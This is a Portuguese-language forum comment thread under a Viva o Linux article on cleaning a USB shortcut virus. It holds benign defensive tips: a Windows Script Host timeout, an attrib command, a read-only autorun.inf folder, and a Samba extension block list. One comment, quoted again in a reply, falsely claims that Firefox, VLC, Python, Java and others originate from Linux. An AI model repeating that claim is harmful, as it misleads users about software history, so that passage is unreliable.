Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

Legal cara, obrigado pela contribuição. Eu especifiquei que não é recomendado remover o wscript.exe, e se remover tentar substituir... Mas enfim, sua dica é mais funcional ainda! Porém, o procedimento é menos intuitivo, e foge do objetivo do artigo.

Peço desculpas por ter fugido do artigo com o meu comentário. E quando disse que esse tipo de medida é paliativa não se ofenda, mas é mesmo. Minha intenção era contribuir com a péssima experiência que tive com esse malware. Com todo respeito, por que é pouco intuitivo? Eu posso fazer no próprio Windows, além de não precisar remover o arquivo WSCRIPT.EXE, e além do mais posso fazer no perfil do usuário. Até concordo, pois o título do artigo é Removendo vírus de Windows com LiveCD GNU/Linux. Da forma que falei não é necessário usar Linux. Outra coisa. Já que gastei essas linhas se me permite e mais uma vez não queria fugir do artigo longe disso eu só queria acrescentar, pois não vi por aqui nos comentários Ok? Quem quiser testar no Windows antes de remover os atalhos tem que verificar se o processo WSCRIPT.EXE está rodando. Caso esteja é necessário removê-lo. Não se ofenda com minhas palavras amigo. Obrigado mais uma vez por contribuir. Já vi muitos usuários formatando pendrive e HD's por causa desse maldito sendo que não é necessário. Grande abraço.

Porque aqui é o Viva o Linux e não o Viva o Windows cara D: Pouco intuitivo porque eu usei este método porque ele "força" o usuário a testar o Ubuntu, usar o LILI, interagir com as interfaces... Digamos que o artigo é "for dummies", se alguém que leu não se encaixa neste grupo, a escolha é própria, a leitura é facultativa, e a opinião ou critica é desnecessária. Não to falando especificamente do teu comentário, mas tem uma galera falando outras formas de remover(dentro do Windows), que o vírus não é isso que é aquilo. Eu não to nem ai! Só mostrei uma forma PROPOSITAL com o Linux, porque eu quero mostrar as vantagens do Linux, pra quem ainda é preso ao Windows. Estritamente isto. Tem muita gente que nem leu o que eu escrevi, e já vai metendo pau, numa tentativa desnecessária de demonstrar conhecimento. Se querem falar isso ou aquilo, cria um artigo próprio e seja feliz. O meu objetivo já foi atingido. Muito Obrigado.

Bacana de sua parte o feedback. Entendi agora. Parabéns pelo artigo. Mais uma vez não meti o pau ;) li todo o artigo se fosse para falar alguma coisa para te magoar nem teria colocado. Aliás nem teria lido, mas gostei tanto que resolvi comentar. Algo que não faço com muita frequência por aqui. Nota 10!!! Valeu.



Não magoou, espero que você também não.
Então ficou tudo certo meu amigo :D Paz de Jah! Valeu.




Que isso, meu caro de forma alguma. Grande abraço. T+

[28] Comentário enviado por henryvieri em 22/10/2013 - 11:34h

Eu uso no Ruimdown os comandos:

attrib -h -r -s /S /D

E resolve na hora!!!

[29] Comentário enviado por px em 22/10/2013 - 15:14h

O bom mesmo é usar o hirens boot pra tirar esses vírus malditos, rsrs. Tem tantas ferramentas que são úteis!

Desde backups a scan de vírus e muito mais!

confiram (link direto versão 15.2):

http://www.hirensbootcd.org/files/Hirens.BootCD.15.2.zip


[30] Comentário enviado por lucianofsjr em 22/10/2013 - 17:28h

galera uma forma simples de evitar problemas de vírus sendo propagado no pendrive é criar uma pasta na raiz do pendrive com o nome "autorun.inf" e colocar a pasta como somente leitura!!
o pendrive muito provavelmente será infectado!! mas ele não propagará a praga quando for espetado em outra maquina.

[31] Comentário enviado por NilPassos em 26/10/2013 - 03:52h

Muito bom artigo.
Já uso o linux para fazer manutenção nos pc's de clientes e principalmente para a remoção de virus.
Tem outros malditos por aí, tais como o Sality, alguns worms e este script, que só saem na marra.
Eu consegui um meio de tirar estes virus pelo próprio Ruindow$, mas o que vale é mostrar como o sistema microsoft é frágil e como o Linux tem se mostrado a melhor opção em segurança na internet atualmente.
Parabéns.
Eu mesmo já havia pensado em publicar algo do gênero, mas deixei passar.Pois aqui é direcionado a usuários de linux, então achei desnecessário.
Caso alguns leitores desconheçam, as ferramentas de manutenção e estruturação de sistemas oeracionais em sua maioria são baseados e ou construídos em cima de um sistema Linux ou Unix.
Podemos citar alguns exemplos:
Nero ( cd de instalação e backup vem com isolinux para o "backitup")
Sm player, Klite codec pack, Autodesk, Vlc, Firefox, Songbird, Xoops, Realplayer( antes chamado de Helixplayer no Linux, se prostituiu depois disso e passou a ser produzido em melhores funções e gráficos para Windows), Java ( que é uma linguagem criada com base Unix).
Tem a menina dos olhos do Linux, nosso querido super servidor Apache, quem não conhece?
O Firebird e a melhor linguagem de programação que existe : Python.
Tudo isso vem do Linux e depois e compilado para executar em Ms.
Então vale salientar aqui que o que você apresentou aqui é muito bom. Mostrar que nosso sistema além de ser um ótimo servidor, um bom desktop é também uma maravilhosa ferramenta para os técnicos de informática...
Até mais.

[32] Comentário enviado por jwolff em 28/10/2013 - 10:40h


[31] Comentário enviado por NilPassos em 26/10/2013 - 03:52h:

Muito bom artigo.
Já uso o linux para fazer manutenção nos pc's de clientes e principalmente para a remoção de virus.
Tem outros malditos por aí, tais como o Sality, alguns worms e este script, que só saem na marra.
Eu consegui um meio de tirar estes virus pelo próprio Ruindow$, mas o que vale é mostrar como o sistema microsoft é frágil e como o Linux tem se mostrado a melhor opção em segurança na internet atualmente.
Parabéns.
Eu mesmo já havia pensado em publicar algo do gênero, mas deixei passar.Pois aqui é direcionado a usuários de linux, então achei desnecessário.
Caso alguns leitores desconheçam, as ferramentas de manutenção e estruturação de sistemas oeracionais em sua maioria são baseados e ou construídos em cima de um sistema Linux ou Unix.
Podemos citar alguns exemplos:
Nero ( cd de instalação e backup vem com isolinux para o "backitup")
Sm player, Klite codec pack, Autodesk, Vlc, Firefox, Songbird, Xoops, Realplayer( antes chamado de Helixplayer no Linux, se prostituiu depois disso e passou a ser produzido em melhores funções e gráficos para Windows), Java ( que é uma linguagem criada com base Unix).
Tem a menina dos olhos do Linux, nosso querido super servidor Apache, quem não conhece?
O Firebird e a melhor linguagem de programação que existe : Python.
Tudo isso vem do Linux e depois e compilado para executar em Ms.
Então vale salientar aqui que o que você apresentou aqui é muito bom. Mostrar que nosso sistema além de ser um ótimo servidor, um bom desktop é também uma maravilhosa ferramenta para os técnicos de informática...
Até mais.


Valeu cara, era exatamente este o objetivo!

[33] Comentário enviado por joaoabi em 11/11/2013 - 14:06h

Muito legal sua dica brother,
Fiz uns testes com alguns pendrivers infectados aqui no serviço e realmente, funciona.

Parabéns.

Att. Joao Abi Saber

[34] Comentário enviado por jwolff em 12/11/2013 - 08:54h


[33] Comentário enviado por joaoabi em 11/11/2013 - 14:06h:

Muito legal sua dica brother,
Fiz uns testes com alguns pendrivers infectados aqui no serviço e realmente, funciona.

Parabéns.

Att. Joao Abi Saber


Valeu cara! :D

[35] Comentário enviado por vitorml_ em 07/02/2014 - 09:04h

Não sabia que esse vírus tinha voltado à tona rsrs Mas qualquer coisa se vier a me deparar com ele novamente, com essa sua ajuda saberei como resolver a bronca! Valeu Jonathan! :)

[36] Comentário enviado por removido em 28/08/2014 - 11:48h

Excelente artigo!
Valeu mesmo, cara!

[37] Comentário enviado por removido em 19/12/2016 - 02:02h


Pode bloquear no samba


*.vbs
*.lnk
*.ini
*.inf



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts